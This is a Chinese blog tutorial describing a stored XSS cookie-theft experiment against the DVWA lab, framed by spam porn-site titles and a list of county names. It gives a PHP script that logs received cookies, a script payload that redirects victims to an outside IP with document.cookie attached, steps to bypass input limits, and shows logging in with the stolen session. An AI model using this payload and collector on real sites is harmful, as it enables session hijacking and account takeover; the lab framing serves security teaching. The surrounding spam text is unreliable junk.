中文字幕av专区_日韩电影在线播放_精品国产精品久久一区免费式_av在线免费观看网站

溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》

存儲型xss盜取cookie實驗

發布時間:2020-06-06 15:59:45 來源:網絡 閱讀:5794 作者:天道酬勤VIP 欄目:安全技術

聲明:僅供交流使用,嚴禁違法犯罪,否則后果自負

1,準備接收cookie的環境:

    

ip為172.24.10.105

代碼為:保存為 getCookie.php

<?php
$cookie = $_GET['cookie'];
$log = fopen("cookie.txt", "w");
fwrite($log, $cookie ."\n");
fclose($log);
echo "***成功";
?>


2,在實驗環境插入js代碼:

<script>document.location='http://172.24.10.105/getCookie.php?cookie='+document.cookie;</script>


通過審查元素把限制取消,然后插入js代碼

存儲型xss盜取cookie實驗

存儲型xss盜取cookie實驗

然后重新訪問這個頁面發現進行了跳轉

存儲型xss盜取cookie實驗

并在接收cookie的平臺看到了cookie

存儲型xss盜取cookie實驗



換一個瀏覽器設置cookie



存儲型xss盜取cookie實驗



直接訪問:

http://127.0.0.1/DVWA/

無需密碼登錄成功

存儲型xss盜取cookie實驗






歡迎關注微信公眾號

存儲型xss盜取cookie實驗

向AI問一下細節

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

AI

东辽县| 西乌珠穆沁旗| 通道| 乌鲁木齐市| 南昌县| 虞城县| 西华县| 长葛市| 平遥县| 银川市| 滨海县| 鄂托克前旗| 萨迦县| 方正县| 绵阳市| 车险| 灌阳县| 泽库县| 德安县| 宜良县| 临洮县| 横山县| 宽城| 唐山市| 长白| 阜康市| 平远县| 寿宁县| 清河县| 雷波县| 监利县| 庄河市| 宜兰市| 岳阳县| 土默特左旗| 微博| 屯昌县| 渑池县| 竹北市| 宿迁市| 陇川县|